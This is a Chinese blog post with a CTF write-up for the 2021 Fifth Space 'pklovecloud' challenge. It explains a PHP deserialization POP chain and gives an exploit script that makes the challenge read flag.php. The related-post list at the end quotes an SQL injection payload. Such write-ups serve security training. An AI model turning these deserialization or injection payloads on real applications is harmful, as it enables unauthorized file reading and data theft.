[第五空间 2021]pklovecloud题解

最新推荐文章于 2024-07-17 20:41:49 发布
最新推荐文章于 2024-07-17 20:41:49 发布
阅读量187 收藏
点赞数
文章标签: linux javascript java web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64222098/article/details/130547466
版权 
<?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

初步看了一下这道题是一个pop链。
我们先来分析一下代码。

$file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file);

这里我们就找到了这个链的终点,即我们可以通过这个file_get_contents函数来获得flag。

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}

在acp这个类里面,我们看到了_toString魔法方法,这个方法是当我们把一个对象当作函数调用时会被自动调用。并且_toString方法里还调用了echo_name()这个函数,这个函数恰巧就是我们先前找到的最终获得flag的地方。所以破题思路就是通过_construct这个构造函数去触发_toString方法,成功调用echo_name()函数。

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}

而在ace类中,我们发现要让 t h i s − > o p e n s t a c k − > n e u t r o n 和 this->openstack->neutron 和 this>openstack>neutronthis->openstack->nova相等才可以。首先变量heat也是没有被赋值的,如果这时我们让变量nova的值也为空的话不久可以了嘛。
根据以上分析,我们可以构造出:

<?php
class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova=NULL;
    function __construct() 
    {      
        $this->cinder = new ace();
    }
}
class ace{
	public $filename='flag.php';     
    public $openstack;
    public $docker;
}
$a=new acp();
echo urlencode(serialize($a));
?>

然后我们在源代码里发现:
在这里插入图片描述
知道了flag的位置了只需要把变量filename的值变一下就成功获得flag了。

dockerere
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[第五空间 2021]pklovecloud 解题思路&过程
iamblackcat's blog
08-06 561
[第五空间 2021]pklovecloud 解题思路&过程
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 609
[第五空间 2021] wp
[第五空间 2021]pklovecloud slackmoon的WriteUp
m0_61155226的博客
06-05 665
NSSCTF[第五空间 2021]pklovecloud
[第五空间 2021]pklovecloud
qq_73767109的博客
07-05 228
同一个类中的两个属性进行强比较,neutron有了赋值且赋值是$heat(整体没有出现)而nova又没有,这种情况下看着是无法相等的,但是这样可以利用null来进行比较,换句话说只要dokcer的类是null,哪无论怎么赋值结果都是null。而要利用到该函数就要大体上看如何构造pop链,可以看到是在rce类中的echo_name方法中,而唯一能调用这个方法的只有rcp类中的Tostring方法中,该方法。2.遇到受保护属性可以通过修改方法中的赋值来修改私有属性(很疑惑序列化后方法不是没了吗)
PHP反序列化&POP链的构造——2021第五空间CTF pklovecloud
iO快到碗里来
09-20 2699
网上关与PHP反序列化&POP链构造的文章有很多,笔者在这里简要讲解一下其相关知识。 0x01 序列化和反序列化 为方便存储和传输对象,将对象转化为字符串的操作叫做序列化( serialize() ),将所转化的字符串恢复成对象的过程叫做反序列化( unserialize() )。 举个栗子: <?php Class test{ public $a= '1'; public $bb= 2; public $ccc= True; } $r= new test(); ec
2021-第五空间智能安全大赛-Web-pklovecloud
qq_53863234的博客
11-29 3306
<?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct()
2021年mathorcupD题解题思路-参考资料代码.zip
09-07
2021年的mathorcup竞赛中,D题是一个挑战性的题目,涉及到深度的算法理解和巧妙的解题策略。本资源包包含了参赛者对于D题的解题思路以及参考资料和代码,帮助我们深入理解这个问题及其解决方案。 首先,我们要...
西邮linux小组2021题解
11-07
西邮linux小组2021题解
第五次练习赛题解1
08-03
【第五次练习赛题解1】是一道编程题目,主要涉及了数组操作、排序以及一些基本的数学运算。下面将详细解析题目所涵盖的知识点。 首先,程序中使用了`qsort()`函数,这是C语言标准库`<stdlib.h>`中的一个函数,用于...
2021年mathorcupD题解题思路参考-代码.zip
10-11
【标题】"2021年mathorcup D题解题思路参考-代码.zip" 提供的是关于2021年mathorcup挑战赛中D题的解题思路及参考代码。mathorcup是一个知名的数学建模竞赛,旨在锻炼参赛者的数学应用能力、逻辑思维以及编程技能。该...
2021第五空间网络安全大赛
Huamang的博客
09-17 1174
WebFTP https://github.com/wifeat/WebFTP 根据github的源码,去对网站进行分析,有写到初始账号 但是题目改了密码,登不进 然后下载到题目的Config.php.bak,看到版本是v2.3 出现了git泄漏,无法下载到文件,但是看到了目录结构 找到探针 http://114.115.185.167:32770/Readme/mytz.php http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo 直接找到f
2021 第五空间 ctf wp
qq_45603443的博客
09-23 2983
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection Misc 签到 flag{welcometo5space} alpha10 分离得到两个图⽚,⼀个jpg⼀个png, 两张图⼀样,想到可能是盲⽔印, https://github.com/chishaxie/BlindWa
[第五空间 2021] Web题解
weixin_51804748的博客
01-18 4900
WebFTP 题目是一个网站管理工具WebFTP2011,上网搜索WebFTP,可以在github中找到这个项目,从README中获取初始用户名和密码 使用说明 1、初始账号 超级管理员 admin 密码 admin888 成功登陆后寻找服务器的网站目录,随便翻看有无可疑文件,最后在phpinfo中找到flag EasyCleanup <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GE
[Injection]对MYSQL 5.0服务器以上版本注入
Gabriel的专栏
09-15 757
by ZaraByteHow to do a SQL Injection for MYSQL Server 5.0+1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
反序列化(Unserialize)题目讲解
qq_49422880的博客
10-05 5613
[RCTF2015]EasySQL 这道题没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 341
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
接着探索Linux的世界 -- 基本指令(文件查看、时间相关、打包压缩等等)
weixin_73359101的博客
07-14 1653
命令输出到某个指定文件中,而不是输出到终端屏幕或终端窗口。我们从键盘输入什么,cat命令就打印什么。命令 + >> + 目标文件名。: 将命令的结果写入目标文件中;这两条指令的作用等价。
Linux中的环境变量
最新发布
qhy850716的博客
07-17 190
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
洛谷B2021python题解
12-23
很抱歉,我无法提供洛谷B2021python题解的具体内容,因为我无法访问引用中的题目。但是,我可以为您提供一些关于洛谷B2021python题解的一般指导。 洛谷是一个在线的编程练习平台,提供了各种编程题目供用户练习和挑战。B2021python是洛谷上的一个题目集合,其中包含了多个与Python编程相关的题目。 要解决洛谷B2021python题目,您可以按照以下步骤进行: 1. 首先,了解Python编程语言的基础知识,包括语法、数据类型、控制流等内容。可以通过学习Python的教程或参考资料来掌握这些知识。 2. 然后,逐个尝试解决洛谷B2021python题目。可以从简单的题目开始,逐渐提高难度。在解题过程中,可以运用已学的Python知识和编程技巧,思考如何实现题目要求。 3. 如果遇到困难或不理解的地方,可以查阅相关的Python文档、教程或向其他有经验的程序员寻求帮助。还可以参考洛谷上其他用户的解题思路和代码,借鉴他们的经验。 4. 最后,提交您的解答代码,并查看洛谷系统给出的反馈和评分。如果答案正确,您将获得相应的分数和排名。 总之,解决洛谷B2021python题目需要掌握Python编程基础知识,并具备一定的编程思维和解题能力。通过不断练习和学习,您可以提高自己的Python编程水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值